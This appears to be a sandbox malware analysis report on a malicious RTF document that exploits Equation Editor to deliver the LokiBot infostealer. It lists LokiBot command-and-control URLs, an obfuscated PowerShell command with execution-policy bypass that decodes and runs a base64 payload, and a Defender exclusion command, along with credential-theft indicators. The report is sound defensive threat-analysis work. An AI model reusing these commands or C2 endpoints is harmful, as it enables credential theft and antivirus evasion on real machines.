Analysis
- max time kernel: 102s
- max time network: 106s
- platform: windows7_x64
- resource: win7-20241010-en
- resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
- submitted: 20-11-2024 10:10
Static task: static1
Behavioral task: behavioral1
- Sample: seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
- Resource: win7-20241010-en
Behavioral task: behavioral2
- Sample: seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
- Resource: win10v2004-20241007-en
General
- Target: seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
- Size: 251KB
- MD5: e6859034a42f217800b6bf0980e93848
- SHA1: 8dcb69dcf727b7a7fbfbf6755492990dc51fd192
- SHA256: 564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1
- SHA512: 778ceefc76571268a7c82c18ec1b6f6661b4f696d2612528b8eb94488383c84c9dba6613cd5b1c715514e64d062d73d28d84395f30dadb4fd2da51cbac372d35
- SSDEEP: 3072:sUcN1DaxXp1sAkC5gCQqCv7L5FokmFJcmrmR3D:slruZ1sA55gCQBL5FokmFyCmR3D
Malware Config
Extracted
lokibot
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
- Lokibot family
- Blocklisted process makes network request 2 IoCs
  flow | pid | Process
  3 | 2824 | EQNEDT32.EXE
  6 | 2500 | poWERShell.eXe
- Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid | Process
  1804 | powershell.exe
- Downloads MZ/PE file
- Evasion via Device Credential Deployment 2 IoCs
  pid | Process
  2500 | poWERShell.eXe
  1056 | powershell.exe
- Executes dropped EXE 3 IoCs
  pid | Process
  2700 | wininit.exe
  1420 | wininit.exe
  1984 | wininit.exe
- Loads dropped DLL 3 IoCs
  pid | Process
  2500 | poWERShell.eXe
  2500 | poWERShell.eXe
  2500 | poWERShell.eXe
- Reads user/profile data of web browsers 3 TTPs
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | wininit.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | wininit.exe
  Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | wininit.exe
- Drops file in System32 directory 3 IoCs
  description | ioc | Process
  File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | poWERShell.eXe
  File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- Suspicious use of SetThreadContext 1 IoCs
  description | pid | Process | procid_target
  PID 2700 set thread context of 1984 | 2700 | wininit.exe | 44
- Drops file in Windows directory 1 IoCs
  description | ioc | Process
  File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EQNEDT32.EXE
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cvtres.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | poWERShell.eXe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | csc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wininit.exe
- Office loads VBA resources, possible macro or embedded object present
- Launches Equation Editor 1 TTPs 1 IoCs
  Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
  pid | Process
  2824 | EQNEDT32.EXE
- Modifies Internet Explorer settings
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
- Suspicious behavior: AddClipboardFormatListener 1 IoCs
  pid | Process
  1680 | WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses 5 IoCs
  pid | Process
  2500 | poWERShell.eXe
  1056 | powershell.exe
  2700 | wininit.exe
  2700 | wininit.exe
  1804 | powershell.exe
- Suspicious use of AdjustPrivilegeToken 5 IoCs
  description | pid | Process
  Token: SeDebugPrivilege | 2500 | poWERShell.eXe
  Token: SeDebugPrivilege | 1056 | powershell.exe
  Token: SeDebugPrivilege | 2700 | wininit.exe
  Token: SeDebugPrivilege | 1804 | powershell.exe
  Token: SeDebugPrivilege | 1984 | wininit.exe
- Suspicious use of SetWindowsHookEx 2 IoCs
  pid | Process
  1680 | WINWORD.EXE
  1680 | WINWORD.EXE
- Suspicious use of WriteProcessMemory 46 IoCs
- outlook_office_path 1 IoCs
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | wininit.exe
- outlook_win_path 1 IoCs
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | wininit.exe
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf"
PID:1680
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory

    C:\Windows\splwow64.exe
    C:\Windows\splwow64.exe 12288
    PID:2356

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
PID:2824
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"
    PID:2880
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
        "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'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'+[CHAR]0x22+'))')))"
        PID:2500
        - Blocklisted process makes network request
        - Evasion via Device Credential Deployment
        - Loads dropped DLL
        - Drops file in System32 directory
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
            PID:1056
            - Evasion via Device Credential Deployment
            - Drops file in System32 directory
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

            C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\klunhxwy.cmdline"
            PID:2184
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory

                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74F2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC74F1.tmp"
                PID:2364
                - System Location Discovery: System Language Discovery

            C:\Users\Admin\AppData\Roaming\wininit.exe
            "C:\Users\Admin\AppData\Roaming\wininit.exe"
            PID:2700
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"
                PID:1804
                - Command and Scripting Interpreter: PowerShell
                - Drops file in System32 directory
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

                C:\Users\Admin\AppData\Roaming\wininit.exe
                "C:\Users\Admin\AppData\Roaming\wininit.exe"
                PID:1420
                - Executes dropped EXE

                C:\Users\Admin\AppData\Roaming\wininit.exe
                "C:\Users\Admin\AppData\Roaming\wininit.exe"
                PID:1984
                - Executes dropped EXE
                - Accesses Microsoft Outlook profiles
                - Suspicious use of AdjustPrivilegeToken
                - outlook_office_path
                - outlook_win_path
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter: 1
- PowerShell: 1
- Exploitation for Client Execution: 1
Credential Access
- Credentials from Password Stores: 1
- Credentials from Web Browsers: 1
- Unsecured Credentials: 1
- Credentials In Files: 1
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3692679935-4019334568-335155002-1000\0f5007522459c86e95ffcc62f32308f1_6110149a-fcf0-442a-a749-601093ba4822
Filesize: 46B
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3692679935-4019334568-335155002-1000\0f5007522459c86e95ffcc62f32308f1_6110149a-fcf0-442a-a749-601093ba4822
Filesize: 46B
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB